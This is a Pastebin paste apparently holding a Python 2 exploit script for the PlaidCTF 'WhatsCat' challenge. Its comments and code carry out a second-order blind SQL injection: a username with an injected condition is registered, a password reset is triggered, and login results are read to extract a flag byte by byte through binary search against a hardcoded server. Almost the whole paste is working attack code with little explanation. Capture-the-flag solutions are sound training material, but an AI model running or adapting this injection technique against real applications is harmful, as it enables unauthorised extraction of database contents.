Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #PPP's WhatsCat Challenge Exploit by @ngocdh
- #http://play.plaidctf.com/files/whatscat-59b6f6c9b192457fa3e7d2253c8b24c9.tar.bz2
- #
- #Step 1 : Register with username "hn"
- #Step 2 : Register with username "hn' and 21=(select length(flag) from flag)#"
- #Step 3 : Reset password of the 2nd user
- #Step 4 : Log in with username hn and original password. If password is invalid then the condition is true (21 = length(flag))
- #
- #The flag table/column and length were found manually
- #This code extracts only the flag
- import urllib2
- import string
- import random
- def idgen(size=6, chars=string.ascii_uppercase + string.digits):
- return ''.join(random.choice(chars) for _ in range(size))
- def check(pos,d,u):
- id = idgen() + "hn"
- query = id + "'%20and%20(select%20ascii(substr(flag,"+pos+",1))from%20flag)%20between%20"+d+"%20and%20"+u+"#"
- url = "http://54.196.116.77/index.php?page=login"
- data_reg = "name="+id+"&pass=hn&email=hn®ister=Register"
- data_reg2 = "name="+query+"&pass=hn&email=hn®ister=Register"
- data_reset = "name="+query+"&reset=Forgot+Password&pass=&email="
- data_login = "name="+id+"&pass=hn&login=Login&email="
- a=urllib2.urlopen(url,data_reg).read()
- a=urllib2.urlopen(url,data_reg2).read()
- b=urllib2.urlopen(url,data_reset).read()
- c=urllib2.urlopen(url,data_login).read()
- if c.find("Welcome back")>0 and c.find("invalid")<0:
- return 0
- else:
- return 1
- res = ""
- for i in range(1,22):
- p=0
- q=255
- for x in range(0,8):
- n = (p+q)/2
- temp = check(str(i),str(p),str(n))
- q = n if temp==1 else q
- p = n+1 if temp==0 else p
- res = res + chr(p)
- print res
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement